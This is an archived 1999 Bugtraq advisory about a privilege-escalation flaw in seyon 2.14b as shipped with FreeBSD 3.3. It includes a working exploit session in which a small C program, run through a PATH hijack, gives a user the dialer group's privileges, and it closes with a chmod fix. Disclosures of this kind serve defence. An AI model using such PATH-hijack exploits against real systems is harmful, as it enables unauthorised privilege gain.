FreeBSD 3.3's seyon vulnerability

From: Brock Tellier (btellierat_private)
Date: Mon Nov 08 1999 - 19:50:38 PST

Next message: UNYUN: "Irfan view 3.07 buffer overflow"

Previous message: UNYUN: "IE4/5 "file://" buffer overflow"
Next in thread: Bill Fumerola: "Re: FreeBSD 3.3's seyon vulnerability"
Reply: Bill Fumerola: "Re: FreeBSD 3.3's seyon vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities
in the bugtraq archives.  I found that the exploit I had developed had already
been discussed in May 1997.  However, this does not change the fact that the
current version of FreeBSD still ships a vulnerable version with vulnerable
privs.  I believe this is still worth noting.  Here is my advisory as it was
to be published before the previous vulnerability came to light.

OVERVIEW
A vulnerability exists in seyon v2.14b which will allow any user to upgrade
his or her privs to those with which seyon runs.

BACKGROUND
This advisory is based entierly off the work I've done on FreeBSD 3.3-RELEASE
and seyon 2.14b which is included on the FreeBSD installation CD as an
"additional package".  When installed via sysinstall, seyon's permissions are
sgid "dialer".  Different versions of seyon and different packages of 2.14b
may have different default permissions.

DETAILS
Upon startup, seyon executes the programs "seyon-emu" and "xterm".  The paths
to these programs are not absolute and are gotten from the users's $PATH.  By
adding a directory we have write access to in our $PATH and putting our own
version of seyon-emu or xterm, we can make seyon run this program with egid
dialer.  

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999    
jkhat_private:/usr/src/sys/compile/GENERIC  i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x  1 bin  dialer  88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
  setregid(getegid(), getegid());
  system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$ 

FIX
Simply chmod 750 `which seyon` and add selected users to the "dialer" group.

Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellierat_private

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

Next message: UNYUN: "Irfan view 3.07 buffer overflow"
Previous message: UNYUN: "IE4/5 "file://" buffer overflow"
Next in thread: Bill Fumerola: "Re: FreeBSD 3.3's seyon vulnerability"
Reply: Bill Fumerola: "Re: FreeBSD 3.3's seyon vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:10:16 PDT